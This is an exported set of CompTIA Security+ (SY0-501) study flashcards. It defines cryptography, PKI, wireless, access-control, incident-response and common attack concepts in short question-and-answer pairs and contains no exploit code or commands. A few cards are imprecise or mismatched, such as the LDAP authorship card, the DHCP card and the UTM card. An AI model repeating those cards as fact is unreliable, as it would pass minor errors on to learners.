SY0-501 1 - 6


Common use cases (for cryptography) (9)

- Low power devices - Low latency - High resiliency - Supporting confidentiality - Supporting integrity - Supporting obfuscation - Supporting authentication - Supporting non-repudiation - Resource vs. security constraints

Hashing algorithms (4)

- MD5 - SHA - HMAC - RIPEMD

Geographic considerations (5)

- Off-site backups - Distance - Location selection - Legal implications - Data sovereignty

PKI Concepts (6)

- Online vs. offline CA - Stapling - Pinning - Trust model - Key escrow - Certificate chaining

Data roles examples

- Owner - Steward/custodian - Privacy officer

Certificate-based authentication (4)

- PIV/CAC/smart card - IEEE 802.1X

Wireless security methods (5)

- PSK vs. Enterprise vs. Open - WPS - Captive portals

Testing Risk Assessment (2)

- Penetration testing authorization - Vulnerability testing authorization

Incident response process (6)

- Preparation - Identification - Containment - Eradication - Recovery - Lessons learned

Asymmetric Algorithms (8)

- RSA - DSA - Diffie-Hellman - Groups - DHE - ECDHE - Elliptic curve - PGP/GPG

Types of actors (6)

- Script kiddies - Hacktivist - Organized crime - Nation states/APT - Insiders - Competitors

General security policies (2)

- Social media networks/applications - Personal email

Multifactor authentication examples (5)

- Something you are. - Something you have. - Something you know. - Somewhere you are. - Something you do.

Things Cryptography supports

- Supporting confidentiality - Supporting integrity - Supporting obfuscation - Supporting authentication - Supporting non-repudiation

Account types (5)

- User account - Shared and generic accounts/credentials - Guest accounts - Service accounts - Privileged accounts

Wireless Cryptographic protocols (4)

- WPA - WPA2 - CCMP - TKIP

Types of certificates (10)

- Wildcard - SAN - Code signing - Self-signed - Machine/computer - Email - User - Root - Domain validation - Extended validation

Cryptography algorithms for obfuscation (3)

- XOR - ROT13 - Substitution ciphers

Which format is used to transfer public keys on Windows?

.cer file format (transfers which key)

PKCS #12 file name

.p12 file

PKCS #7 file name

.p7b file

Which format is used to transfer private keys on Windows?

.pfx file format (transfers which key)

Symmetric encryption Key strength

128 bit and larger

AES

128-bit block cipher. 128-, 192-, and 256-bit keys

Twofish

128-bit block size, key sizes up to 256 bits. No patent; it is in the public domain.

SHA-1 (2)

160-bit digest. Retired for most US government use.

MD5 concerns (2)

1996: collisions found. 2008: researchers created CA certificates that appeared legitimate when checked with MD5.

NFC

Two-way, close-range wireless communication.

AP band selection and bandwidths: 2.4 GHz

2.4 GHz non-overlapping channels: 1, 6, 11. 20 MHz throughput.

SHA-1 concerns

2005 collisions found.

Asymmetric encryption Key strength

3,072 bits and larger

Problem with DES (2)

56-bit keys; easy to brute force with today's technology.

Blowfish (4)

64-bit block cipher, variable-length key (32 to 448 bits). No known way to break the full 16 rounds of encryption. Not limited by patents.

ALE example

7 laptops stolen a year (ARO) x $1000 (SLE/asset value) = $7,000 (example of)

Staging Environment

A "production like" environment to run performance tests and test usability and features.

USB blocking (2)

A DLP on a workstation that blocks use of USB. Prevents exfiltration of data and downloading of malicious data from USB.

permanent (persistent) agent (3)

A NAC agent that is installed on a client. It checks the client for health. Periodic updates may be required.

RAT (e.g)

A Trojan horse that sets up a backdoor allowing other malware to be installed, e.g. keyloggers, screenshot/video capture, file copying.

Exploitation frameworks

A basic framework that already has built-in mechanisms to deliver a payload and have it execute. All it requires is the exact code to insert to complete the exploit.

Diffie-Hellman key creation process (3)

A combines A's private key with B's available public key. B combines B's private key with A's available public key. The two created keys are identical symmetric keys.

Diffie-Hellman (2)

A key exchange asymmetric algorithm that transfers symmetric keys over insecure channels. Does not itself encrypt or authenticate.

Authentication issues (3)

A lapse in any part of the authentication process can open the entire network: weak passwords, not enough authentication factors. It may allow the wrong people access and block the right people. MFA also means more chances for problems.

What environments are WAFs often used?

A major focus of Payment Card Industry Data Security Standard (PCI DSS)

(Digital certificate) Serial Number

A number uniquely identifying the certificate within the domain of its CA

Metasploit

A penetration-testing tool with thousands of known exploits that can be used together to test a system

Whaling

A phishing attack that targets high-profile targets like a CEO.

Nonce

A random or pseudo-random number that is used once in a cryptographic communication.

replay attack

A replay of information captured over the network to make the bad guys seem like the original users.

Out-of-band response

A response sent by an IPS set for passive monitoring, from outside the traffic flow, to stop the transfer of malicious traffic.

ROT13

A substitution cipher that rotates characters 13 places.

Layer 3 switches (2)

A switch and a router in the same device. Switch ports run at layer 2 and router ports at layer 3.

Aggregation switches

A switch that provides connectivity for several other switches and the core of the network.

Program virus

A virus attached to or associated with an application

Thick AP

An AP that handles most of the wireless tasks itself, while the switch has no control or management of the AP's functions.

Thin AP

An AP that is less intelligent and less expensive and is centrally managed from the switch it's connected to.

ALE

ARO x SLE

Man-in-the-Middle

ARP poisoning: sending users ARP requests that update their ARP tables so they send data to the bad guy, who forwards it to the router.

Authorization

Access someone has based on their identification and authentication.

Round robin and affinity refer to this type of load balancing

Active/active load balancing

AES history of implementation

Added to FIPS in 2001. It took 5 years to standardize this replacement for DES.

GPS tagging (Geo tagging) (ie)

Adds location to document metadata, i.e. adds GPS coordinates to photos and videos taken, etc.

Rule Based Access Control (RBAC)

Administrator creates ACLs for objects and system enforces the rules.

Best choice for removing Malware from a system if no backup option

Advanced malware tools

Benefits of SDN (4)

Agile: changes can be made very quickly and rolled out automatically. Managed centrally. Orchestration. Open standard (vendor neutral).

ISA

Agreement used by the US Federal Government to define security controls.

Ad Hoc examples (2)

AirDrop. Contact-sharing apps.

types of wireless crackers (2)

Aircrack-ng Suite, Fern

Bluesnarfing (2)

Allowed attackers to take files from Bluetooth-enabled devices, especially if they knew the name of the file. Patched in 2003.

IPSec (Internet Protocol Security)

Allows layer 3 encryption, authentication, confidentiality, and integrity/anti-replay between sites

watering hole attack (2, ie)

An attack method that infects sites that a group is likely to trust and visit. Could be websites or local coffee shops, etc. Tends to infect all visitors while waiting for specific ones.

Zero-day attack

An attack that exploits a vulnerability that has not been detected or published.

archive bit

An attribute of a file that shows whether the file has been backed up since the last change.

EAP (2)

An authentication framework. WPA and WPA2 use five types as authentication mechanisms.

BCRYPT is an extension of which library?

An extension of the UNIX crypt library.

Rainbow tables (2)

An optimized, pre-built set of hashes that can be searched to match hashes in seconds if that password is on that table. Need different tables for different hash methods.

ways to configure full device encryption (2)

Android: strong/stronger/strongest. Apple iOS has similar functionality.

Baseline Deviation (3)

Any changes to the norm: identify them and send alerts immediately. Document everything well. Posture assessment can be done on VPN connections, disallowing access if there are mismatches.

central app clearinghouses (3)

Apple App store. Google Play. Microsoft Store

Multipurpose proxies (3 eg)

Application proxies that understand how to proxy many applications: HTTP, HTTPS, FTP, etc

Logs and events anomalies

As you build extensive logs on a SIEM from many different sources and begin correlating all the data, you can start extensive analysis and spot logs and events that deviate from the norm more easily.

Web Incident Category

Attack executed from a website or web-based application

Improper usage Incident Category

Attack resulting from a violation of AUP

Personnel issues: Insider threats (and concern)

Authenticated users have freer rein: there is not as much security inside. A bigger problem if rights and permissions are greater than necessary.

Using a salt and password to create a hash is an example of what cryptography use case?

Authentication (Common use cases example)

Something you do

Authentication factor based on someone's personal way of doing things.

Secure token (2)

Authentication mechanism that is added to clients when they authenticate. It is provided with each request to the server, where it's validated.

Principles of social engineering (7)

Authority, Intimidation, Consensus, Scarcity, Familiarity, Trust, Urgency

Examples of Security Automation (4)

Automate: functional security tests. Test against known vulnerabilities. Penetration testing. Test the application with unexpected input.

Automation/scripting (3)

Automated courses of action. Continuous monitoring. Configuration validation

FDE (3)

Automatically encrypts the entire drive: data and OS. Requires a password to access. Often built into the OS.

GPG is available for what OS?

Available for Linux, Windows, Mac OS, and many others.

full backup

Backup that copies all files from a system.

(Backup) Distance (2)

Balancing act between recovery (scale of disaster) and accessibility (travel for staff). Unique requirements, e.g. specialized printers, bandwidth availability.

Accidental/"friendly" DoS (3 eg)

Bandwidth overload, i.e. a gigabyte download over DSL. Layer 2 loop without STP. Building breaks, i.e. water lines.

Downloadable Exploitation frameworks (3)

BeEF - The Browser Exploitation Framework Project. RouterSploit: Router Exploitation Framework. Metasploit: Build your own vulnerability tests or use modules in existing exploit databases.

Fighting WPS

Best practice is not to use it; too many vulnerabilities.

False negative best practice

Best to update latest signatures before scans.

CCMP (3)

Block cipher mode. Uses 128-bit keys and 128-bit block sizes.

BYOD aka

Bring your own technology

On-boarding

Bringing in new hires or transfers into the organization.

Identification of an incident: incident indicators (4)

Buffer overflow attempts identified by IPS/IDS. Malware identified by antivirus. Configuration change detected by a host-based monitor. Network traffic deviates from the norm.

Risk Transfer (2)

Buy insurance. Mitigate risk by shifting it to a third party.

How does segmentation improve performance?

Segmenting high-performance applications onto their own network ensures the highest efficiency possible.

Private CA (2)

CA built in-house by a medium-to-large organization. All network devices must be configured to trust the internal CA.

Offline CA

A CA that is taken offline, usually the root CA.

Reporting requirements/escalation Corporate / Organization contact examples

CIO. Head of Information Security. Internal response teams.

Industry-specific frameworks (2)

COBIT. ITIL

CYOD

COPE device that a user chooses from options provided by the company.

Substitution Cipher example

Caesar Cipher (example of)

'CALL get_options'

Call command with name of stored procedure

A network-based firewall can act as what other devices?

Can act as a VPN concentrator, proxy, and router.

How to create your own digital certificates. (#?)

Can be built into the OS, e.g. part of Windows domain services. Third-party options for Linux.

Weak security configurations (3)

Can be easily cracked. Gives a false sense of security. Outdated, easy to decrypt, or has known vulnerabilities.

Cost of MFA (3 eg)

Can be expensive, e.g. separate hardware tokens, specialized scanning equipment; or cheap, e.g. free smartphone applications.

Push notification services management

Can be managed locally or from MDM

Email encryption on Mail Gateways (4)

Can check email encryption on gateways since encryption is not always automatic. Based on policy, check that the policy applies to encrypt data for particular emails. Force the encryption, send a password to the sender, or a text to the recipient. Emails that already have an encryption process can be sent normally.

Security concerns with Media gateway (3)

Can disable all voice communications (DoS). Make outbound calls: spam, malicious services. Listen to voice communications: corporate espionage.

What OS can access violations occur in?

Can occur in any OS, including some as simple as a credit card terminal.

Special purpose embedded devices: Vehicles security concerns (2, e.g)

Can remotely monitor what's happening within that car. Can control internal electronics, e.g. disable the engine.

Non-persistence: live boot media (2)

Can run OS and application instances from portable media. Moves the OS and application instances from place to place.

What happens next if everything works in the test environment?

Can stage all that code and prepare it for production.

What can protocol analyzers do with data?

Can store data over long periods and use analytics to see what happened to that data during that time frame.

How are IPS tested for effectiveness?

Can test catch/miss rates of false negatives with industry tests.

Remote attestation (3)

Uses a centralized server to inventory the hardware and software on remote devices. It digitally signs and encrypts the results of that inventory with the TPM in that device. Before devices boot, changes are identified based on the previous inventory.

Elliptic curve (3)

Uses curves and smaller numbers than asymmetric encryption. Smaller storage and transmission requirements. Perfect for mobile devices.

ECC (2)

Uses curves instead of large numbers. Smaller keys.

What communication can be sent over SATCOM?

Uses digital communication: voice and data.

Infrastructure as a Service

Uses hardware available in the cloud to run your own software.

Pulping (2 def)

Uses a large tank to remove ink from paper to create recycled paper. Reduces shredded paper to a mash or puree (which may be a raw material to make paper).

Attribute-based access control (ABAC)

Uses many different criteria to determine what kind of access a user may have.

Perfect forward secrecy

Uses temporary keys, like elliptic curve or Diffie-Hellman ephemeral keys, for every session.

Email certificates (2)

Uses the recipient's public key to encrypt the contents of emails. Uses your own private key for the digital signature on an email.

How IPS act as Application-aware security devices

Uses a subset of signatures for application-specific vulnerabilities; fewer false positives.

Key exchange

Using asymmetric encryption to transfer symmetric keys.

Non-persistence: Revert to a known state

Using snapshots to revert to previous configurations if current ones have problems.

Non-persistence: Rollback to a known good configuration

Using snapshots to revert to previous configurations while keeping current data.

Which validation point is fastest for checking data and why?

Usually client-side validation instead of server-side, since it takes place on the user's computer.

Onboarding (security procedures)

Usually a formal process involving an induction or training process covering the security aspects of the role.

Social media security policies (3)

Usually an extension of the code of conduct. Balances the company's requirements for its use with allowing employees to take advantage of it. Confidential information can only be shared by a company spokesperson for public comments.

Remote access VPN

Usually software built into a remote device to communicate with VPN concentrators.

Reason for different time offsets (4)

Usually determined by time zone settings on local devices. Different file systems store timestamps differently: FAT stores time in local time. NTFS stores time in GMT.

APT

Usually done by governments that spend massive resources on constant attacks.

vulnerability scanning (4)

Usually minimally invasive while gathering as much info on a system as possible without performing any exploits. Port scan to see open services and their versions. Identify systems and security devices. Test inside and outside of a system.

Certificate issues (4)

Usually result when best practices are not followed: have the certificate signed by someone trusted. Update certificates regularly. Applications must perform proper certificate checks. Missing checks could allow MitM attacks to occur.

Proper input validation

Validate and check for what is expected in that input field.

Configuration Validation (2)

Validate the configuration of, e.g., an application instance before going live and afterwards by constantly using automated checks. Comparing system configurations to a configuration file.

Authentication

Verifies the source of the data.

How to verify unencrypted credentials?

Verify with a packet capture; check whether the data is readable and in the clear.

PEM (2)

Very common format provided by CAs. ASCII format, letters and numbers, making it easy to transfer and email.

symmetric algorithm advantages

Very fast to use, with less overhead.

Discretionary Access Control (DAC) security and concerns

Very flexible, but very weak security since it relies on the owner to set proper security.

confidential data

Very sensitive data that requires approval to view (often PII).

IPSec standardization

Very standardized: firewalls from different manufacturers can be used on each side.

dynamic analysis concerns

Very time- and processor-intensive.

virtualization on the enterprise-level

Virtualization itself is the OS that other OSes run on top of.

Host-based virtualization

Virtualization on normal desktops.

Script virus

A virus that runs as a script in the OS or browser. Often attached to emails.

Vulnerabilities due to Lack of vendor support (3)

Vulnerabilities that arise when vendors aren't diligent in their search for vulnerabilities and in providing patches. This is an issue when the vendor has access to the code and isn't aware of the problem or doesn't care about fixing it. A big concern in IoT devices.

New threats/zero day

Vulnerabilities that are newly discovered and not yet addressed by a patch.

non-credentialed scan

A vulnerability scan from the outside with no access or authentication.

(Vulnerability scan results) Identify Lack of security controls (3)

Vulnerability scan results will inform if: no firewall. No anti-virus. No anti-spyware.

(Vulnerability scan results) identify Common Misconfigurations (2)

Vulnerability scan results will inform if: open shares. Guest access.

Identification of an incident: precursors (3)

Web server logs showing vulnerability scans. Exploit announcements. Direct threats.

SAML disadvantage

Was never designed for mobile apps.

DAP replacement

Was replaced by the more lightweight LDAP, which uses TCP/IP.

Passive (security) tools

Watch packets as traffic goes by and give info on what may be happening inside the traffic or on the client or server.

DLP

A way to monitor traffic and stop the loss of sensitive data.

reason PAP has no encryption

We didn't require it on analog dial-up lines since there was no mechanism to grab that data.

Example of weak implementations (3)

Weak encryption. WEP: the RC4 key can be recovered with enough packets. DES: small 56-bit keys.

UTM aka

Web security gateways

Certificate chaining security and concerns

The web server needs to be configured with the proper chain certificates or the end user may receive an error.

Identification of critical systems

What computing systems or IT services are required for these mission-essential business functions?

What does the log of the host-based firewall show?

What traffic was allowed or blocked.

Collision

When two different plaintexts produce the same hash.

When is Remote wipe used? (2)

When a device is stolen. When someone leaves the organization.

End-of-life vulnerability

When a device or software is no longer supported by the vendor, which stops security patches.

False negative

When a vulnerability exists but the scan did not detect it.

dead code

When an application runs an executable and makes calculations to form results that are not used anywhere else in the application.

Diffusion

When one character of the plaintext input is changed, many characters change in the ciphertext output.

Pinning

When the server's certificate or public key is hard-coded into the application. The application compares the certificate on the server to the hard-coded one.

Misconfiguration/weak configuration

When there's a weak link or an open door somewhere in the system setup through which someone on the outside can easily gain access.

Proper error handling

When writing applications, make sure error messages don't display more information than necessary.

Buffer overflow (3)

When written memory spills past its allocated space and into other memory. May allow more access to the system. Often it can cause crashes.

Buffer overflow (3)

When written memory spills past its allocated space. It takes time to find one that is controllable and repeatable. Often it can cause crashes.

identification (2)

Who someone claims to be. Usually a username.

the scope of a Tabletop exercise (4)

Who to invite: internal discussion only, or local first responders and third parties. How big the disaster is. Can give no details until the exercise begins. Can set limits on what information is available for the drill.

Example of an everyday Faraday cage

The window of a microwave oven.

Jamming

A wireless RF DoS that decreases the signal-to-noise ratio at the receiving device to the point where it can't hear the good signal.

WPA (3)

A wireless encryption protocol that uses the RC4 cipher with TKIP. Used a larger IV. Every packet gets a unique 128-bit encryption key.

wireless scanners/crackers (4)

Wireless monitoring tools can capture packets across the network (and can try wireless attacks to see if an AP is susceptible to deauthentication attacks, rogue APs, etc.). Wireless cracking tools find wireless network passwords/keys: find a WEP key, brute force a WPA/WPA2 key.

Which replay attacks are easier to capture?

Wireless replay attacks are easier than wired ones.

ANT/ANT+

A wireless sensor network protocol that uses the 2.4 GHz ISM band.

ANT/ANT+ security concerns (3)

Wireless, so the same concerns: jamming. Encryption is optional, so replay attacks.

XOR advantages

With a truly random key, the obfuscation results are theoretically unbreakable.

How Host-based firewall act as Application-aware security devices

Work with the OS to determine applications.

Principles of social engineering: Urgency (2)

Works alongside scarcity. Tries to make you act quickly without thinking.

LDAP Standard was written by

Written by the International Telecommunication Union (ITU).

Linux OS Update options (4)

yum, apt-get, rpm, graphical front-ends

types of controls (8)

- Deterrent - Preventive - Detective - Corrective - Compensating - Technical - Administrative - Physical

Spam filter on a Mail Gateway (5)

Can whitelist emails from trusted senders. SMTP standards check: block anything that doesn't follow RFC standards. Perform rDNS on the sender's domain name to check that the entry in the DNS server matches the sender's email. Tarpitting: intentionally slow down server conversations to make spammers give up. Recipient filtering: block all inbound email not addressed to a valid recipient email address.

Session Hijacking

Capturing session IDs or accessing cookies where the IDs are stored to gain access to the user's account.

Proximity Cards (3)

Cards that grant access to door locks or doors by moving the card close to a reader. The card is powered by the reader. Often used as an identifier that is compared to a larger database stored elsewhere.

keyCertSign (5.)

Certificate standard extension used by a CA for certificate signing

keyAgreement (4.)

Certificate standard extension used for Diffie-Hellman key agreement

keyEncipherment (2.)

Certificate standard extension used for key exchange

dataEncipherment (3.)

Certificate standard extension used to make data confidential

cRLSign (6.)

Certificate standard extension used to sign a Certificate Revocation List

encipherOnly (7) decipherOnly (8)

Certificate standard extension used with the Diffie-Hellman key agreement

Fighting logic bombs (3)

Change control. Alert on changes with tools like HIDS, Tripwire, etc. Constant auditing.

OS secure configurations (secure configuration guides) (4)

Check and secure: updates. User accounts. Network access. Ongoing monitoring, anti-virus and anti-malware.

Fighting phishing (3)

Check for errors in the URLs, graphics, fonts, spelling. Don't give personal info over the phone. Don't click links in emails; go directly to the site yourself.

weak cipher suites (2 eg)

Ciphers that are easy to break and should be avoided: keys of less than 128 bits; outdated hashes like MD5 with known collisions.

LWAPP (2)

Cisco proprietary protocol that wireless LAN controllers use to communicate with WAPs. Allows managing multiple APs simultaneously.

PEAP created by (3)

Cisco, Microsoft, RSA Security

cloak & dagger (2)

Clickjacking on Android phones, OS up to v7.1.2. An invisible layer is used to monitor keystrokes and record user input.

Public cloud deployment model

Cloud available to everyone over the internet

Platform as a service (3)

Cloud handles servers, software, maintenance, and platform, and user handles development to get the software running. Building blocks are provided for development.

TKIP (3)

Combines a secret root key with the IV. Adds a sequence counter to prevent replay attacks. Implements a 64-bit Message Integrity Check.

DevOps (3)

Combines development, operations and QA into one team. Emphasis on automation and monitoring. Shrinks deployment cycles.

Common Criteria for Information Technology Security Evaluation aka

Common Criteria (or CC)

X.500 Attribute CN

Common Name. Identifies the person or object.

Where are Evil twins commonly found

Common in locations not using 802.1X, like hotels and coffee shops.

Where secure tokens are used

Commonly used in federations; can be provided by a third party.

Logic Bomb (4)

Computer code that lies dormant until it is triggered by a predefined event. Usually causes massive damage. Time bombs wait for a date or time. Antivirus can't detect it.

Places DLP implemented (3)

Computer/endpoint DLP: data in use. On the network: data in motion. On the server: data at rest.

Secure Ad Hoc Topology (4)

Configure these settings through MDM: allow/disable this feature. Allowed only with the right credentials. Limited to certain apps.

Flood guard (3)

Configures a maximum number of source MAC addresses on an interface to prevent a DoS with MAC addresses. Maintains a list of every source MAC address. Once the maximum is exceeded, port security activates, which by default usually disables the port; it can filter instead.

The data looking different after going through a PGP key is an example of what?

Confusion (example)

USB OTG (2)

Connect multiple mobile devices directly together. Mobile device acts as both a host and storage device.

TPM Persistent memory

Contains hard-coded keys inside the hardware that were burned in during production.

COBIT stands for

Control Objectives for Information and Related Technology

Media gateway (2 e.g.)

Converts between PSTN and VoIP, e.g. ISDN to Ethernet with VoIP, SIP to H.323, etc.

Which deployment model offers the most security?

Corporate-owned deployment model

URL hijacking examples

Could be typos, brandjacking, different top-level domains (.org/.com)

X.500 Attribute C

Country. The country's 2-character ISO code (such as c=US or c=GB)

AH

Created by combining the IP header and data with a hash (MD5, SHA-1, SHA-2). Provides authentication and integrity. Original packet: IP Header/Data. Tunnel mode: New IP Header/AH Header/IP Header/Data.

X.500 Attribute usual order from root to Leaf object (7)

DC, C, ST, L, O, OU, CN

Secure version of DHCP

DHCP has no built-in security

Email DLP (3)

DLP on email using a local appliance or a cloud-based service, inbound or outbound. Inbound: blocks keywords, identifies forgeries, quarantines email messages. Outbound: stops fake wire transfers, W-2 transmissions, employee information, social security numbers, etc.

Cloud-based DLP (3)

DLP between the users and the internet: blocks custom-defined strings. Manages access to URLs. Blocks viruses and malware.

Zones/topologies (8)

DMZ. Extranet. Intranet. Wireless. Guest. Honeynets. NAT. Ad hoc

secure protocol(s) for Domain Name Resolution

DNSSEC

Who is responsible for signing off on the compliance of data?

Data owner (responsible for)

(Backup) Location Selection: data sovereignty (1, 2 eg, 1)

Data that resides in another country is subject to its laws, e.g. legal monitoring and court orders. Compliance laws may prohibit moving data out of the country.

Data-in-transit aka

Data-in-motion (aka)

(Digital certificate) Valid From / Valid To

Date and time during which the certificate is valid.

Standard operating procedure examples (3)

Day-to-day processes and procedures for: New user account creation. Backup data storage requirements. Encryption key requests

AKA layered security

Defense-in-depth (aka)

Fighting watering hole attacks (ie)

Defense-in-depth. Have as many security methods layered on top of one another as possible: updated antivirus, IDS, firewalls, etc.

Darik's Boot and Nuke (DBAN)

Permanently deletes everything on an entire hard drive.

Microsoft SDelete

Permanently deletes individual files or folders.

DES creation

Developed between 1972 and 1977 by IBM for the NSA

Fighting Buffer overflows

Developers need to perform bounds checking to confirm information fits perfectly into the space that's been allocated.

DDoS mitigator (4)

Device that can resist a DDoS attack or minimize the impact. Cloud-based: internet provider or reverse proxy service. On-site tools: DDoS filtering in a firewall or IPS. Positioned between the user and the internet.

SSL/TLS decryptor (2)

Device that sits between a third party and the user, decrypts data, checks for anything malicious and re-encrypts it. Decryption is allowed based on certificate trust with the site.

Application-aware security devices (3)

Devices that can identify traffic based on an application: network-based firewalls, IPS, host-based firewalls.

Misconfigured devices (3)

Devices that have: a default username and password. Outdated software with known vulnerabilities. Debug or maintenance code running, which provides more information to users than is normally available.

What do routers connect? (2)

Different subnets. Different network types: LAN, WAN, copper, fiber.

Mobile Device Hotspot/tethering security

Disable on MDM to prevent a device from becoming a rogue AP.

Pixie Dust

Discovered in 2014. A poorly encrypted WPS PIN can be received and brute forced offline in less than 30 minutes.

Access control found in most OS

Discretionary Access Control (DAC)

Special purpose embedded devices: Aircraft/UAV security concerns

DoS could damage the aircraft and others on the ground.

Business Impact Analysis (4)

Document the critical business functions. Impact of their loss. How long it will be impacted. Calculate if disaster recovery is a good investment

Incident analysis resources examples (4)

Documentation, network diagrams, baselines, critical file hash values

Do stateless firewalls keep track of sessions?

Doesn't keep track of sessions

Mesh trust model concerns

Doesn't scale well.

X.500 Attribute DC

Domain Component. Components of the object's domain, e.g. DC=com

dig stands for?

Domain Information Groper.

fighting hoaxes (3)

Don't believe anything on the internet. Verify and check the source (hoax-slayer.net, snopes.com). Spam filters.

Fighting Trojans (3)

Don't run unknown software. Antivirus that has its signature can stop it even if the user tries to run it. Keep backups and restore from them.

MS-CHAP best practice

Don't use it. Better to use L2TP, IPsec or some other VPN technology

FDE security

Drive stays encrypted even if lost or moved to another computer.

Driver behind RADIUS Federation. (2)

Driven by eduroam (education roaming). Educators can use their normal authentication when visiting a different campus.

Driver Manipulation (2)

Drivers are privileged code trusted by the OS, so they are a convenient place to embed malicious software. Could be used to monitor video, keyboard, mouse.

Original XSS

Due to early browser security flaws, information could be shared between sites if both of those sites were open as windows in your browser.

when archive bit clears and doesn't

Clears during full and incremental backups. Doesn't clear for differential backups.

EMI/EMP concerns (2)

EMI leakage. Injecting signals into EMI.

Round robin scheduling (1 eg, 2 types)

Each server is selected in turn, e.g. the 1st set of traffic goes to server A, the 2nd to server B, etc. Weighted: prioritize certain servers to receive more load. Dynamic: monitor server load and distribute to the server with the lowest use.

advantage of Hierarchical CA

Easier to deal with the revocation of an intermediate CA than a root CA.

ESI stands for?

Electronically Stored Information

Personal issues: Personal emails (2)

Emails sent from work imply endorsement by the organization. Use company resources, may attach sensitive info.

Type I hypervisor aka (2)

Embedded hypervisor. Native hypervisor.

BYOD (2)

Employee uses their own device for personal and corporate use simultaneously. Needs to meet the company's requirements, e.g. same OS.

Fighting Evil Twins (2)

Encrypt communications. HTTPS/VPN

WiFi mobile security

Encrypt data to fight data capture and MITM

Secure coding techniques: encryption

Encrypt source code, data in motion and data at rest.

confidentiality

Encrypted data

Fighting session hijacking (2)

End-to-end encryption: Firefox extension Force-TLS. Partial encryption: encrypted local wireless, VPN (OpenVPN, VyprVPN).

ECB

Encryption mode that encrypts each block with the same key using the block cipher.

Privacy impact assessment (3)

Ensure compliance with privacy laws and regulations. What PII is collected and why. How the PII data will be collected, used, and secured.

Production environment

Environment where application is made live and rolled out to the user community.

Rack monitoring (3)

Environmental sensors. Webcams or security cams. Integrated with Enterprise monitoring systems that can detect temperature changes and motion.

EAL stands for?

Evaluation Assurance Level

collision security

Every plaintext should have a different hash associated with it

Hot site (4)

Exact replica of the production system. Buy two of everything. Applications and software are constantly replicated and updated. Flip a switch and the entire production environment can move here.

Pwn2Own competition example of what?

Example of VM escape protection presented as a hacking competition to find vulnerabilities for some prizes.

Documented incident categories examples from the Computer Incident Handling Guide (6)

External/removable media. Attrition (e.g. brute-force attacks). Web. Email. Improper usage. Loss or theft of equipment.

SED (2)

FDE built into the circuitry of these drives. Doesn't require FDE OS software.

Hardware/firmware security (10)

FDE/SED. TPM. HSM. UEFI/BIOS. Secure boot and attestation. Supply chain. Hardware root of trust. EMI/EMP

SHA a part of

FIPS (hash standard)

secure protocol(s) for file transfers

FTPS, SFTP

DEP (2)

Feature where the OS works with the CPU to allocate a section of memory for executables. Prevents malware from executing in non-executable areas.

DES is part of

Federal Information Processing Standards (FIPS)

VM escape protection

Find and patch vulnerabilities to escape VMs.

What other devices can act as Site-to-Site VPN?

Firewalls

How to fight worms (2)

Firewalls and IPS/IDS can mitigate types with well-known signatures. Once they are inside they spread quickly and are hard to stop.

Defense in depth examples (9)

Firewalls. DMZ. Hashing and salting passwords. Authentication. IPS. VPN access. Card/badge access. Anti-virus and anti-malware. Security guard.

Camera properties (3)

Focal length: shorter is a wider angle. Depth of field: see sharp images across large distances. Infrared: see in the dark.

High resiliency (for cryptography)

For concerns of integrity use: Larger key sizes. Strong encryption. Hashing to check data integrity.

examples of input methods that should be checked for proper input validation (3)

Forms. Command line. Fields.

Types of proxies (6)

Forward and reverse. Transparent and explicit. Application/multipurpose

ITIL

Framework that breaks down the IT life cycle: Service Strategy, Service Design, Service Transition, Service Operation, Continual Service Improvement

COBIT

Framework that focuses on regulatory compliance, risk management and aligning IT strategy with organizational goals.

Order of volatility (7)

From most to least: 1. CPU registers, CPU cache. 2. Router table, ARP cache, process table, kernel statistics, memory. 3. Temporary file systems, pagefile. 4. Disk. 5. Remote logging and monitoring data. 6. Physical configuration, network topology. 7. Archival media.

backup/ restore times

Full: High backup / Low restore. Incremental: Low backup / High restore. Differential: Moderate backup / Moderate restore.

location-based policies, location finding examples (3)

GPS: very accurate location on mobile devices. 802.11 wireless gives a regional view. IP address is not very accurate, since it can report a location outside the country.

Ways to perform domain hijacking (3)

Gain access by brute force, by social engineering the owner or domain registrar, by gaining access to the email account that manages the domain, etc.

Domain hijacking

Gain access to the domain registration, usually to change the domain's DNS information to DNS servers controlled by the bad guys.

Privilege Escalation (4)

Gives higher-level access to a system than allowed. Often due to a bug or vulnerability. Commonly administrative, so it should be resolved quickly. Access could also be horizontal.

Payment systems NFC is used in (3)

Google Wallet. MasterCard partnership. Apple Pay.

RFC 3227 (2)

Guidelines for Evidence Collection and Archiving. Provides best practices for forensic data collection.

What is referred to as an endpoint security agent?

HIDS/HIPS (referred to)

HMAC examples (2)

HMAC-MD5. HMAC-SHA1

Process of Hot and cold aisles

HVAC systems at the end of each aisle. Cool air is sent through the floor and up into the cold aisle. Cool air is pulled through the server racks to the back of the servers and into the hot aisle. Hot air rises and recirculates into the HVAC.

RC4 concerns (3)

Had a "biased output": if the 3rd byte of the original state is zero and the second byte is not equal to two, then the second output byte is always zero.

What chemical used to be used for fire suppression but no longer and why?

Halon. No longer manufactured since it destroys the ozone.

Technical Controls (3 eg)

Hardware and software to keep things secure: Firewalls, AD authentication, disk encryption, etc

Few things that should be well documented to create a baseline (4)

Hardware, software, network traffic patterns, data storage

Reporting requirements/escalation (2)

Have a contact list ready for different incidents. Could be within organization, internal non-IT or external.

VM sprawl avoidance (2)

Have a formal process and document everything as you provision new systems. Perform audits to determine if VMs need to be deprovisioned.

Fighting Birthday attacks

Have larger hash output sizes to avoid collisions.

PHI

Health information associated with an individual

PHI examples (3)

Health status, health care records, payments for health care. (An example of data sensitivity labeling.)

Lighting security (3)

Helps see everything on camera for non IR cameras. Light angles may be important for facial recognition. Avoid shadows and glare.

Hardware Security Module (3)

High-end cryptographic hardware used in large environments, often to manage clusters of servers with many keys to protect. Can be a plug-in card in a proxy or firewall. Provides secure key backup. Can be an SSL accelerator.

Implementations of Air gaps (2, 2 eg)

Highly secure networks. Industrial systems, e.g. SCADA, manufacturing

Preservation (3)

Holding on to forensic data for: the current investigation; future investigations, to view correlations; when new items of interest are discovered.

Remote access VPN aka

Host-to-Site VPNs (aka)

Load balancer scheduling and types

How load is scheduled to go behind a load balancer: Affinity. Round robin.

Reporting requirements/escalation: Internal non-IT contact examples

Human resources. Public affairs. Legal department

Switch port security (3)

IEEE 802.1X: Port-based Network Access Control (NAC), which doesn't allow access until the user authenticates. Administratively disable your unused ports. Enable duplicate MAC address checking to stop spoofing.

Spanning Tree Protocol standard

IEEE standard 802.1D

IPsec AH ESP Transport mode

IP Header/AH Header/ESP Header/Data/ESP Trailer/Integrity Check Value

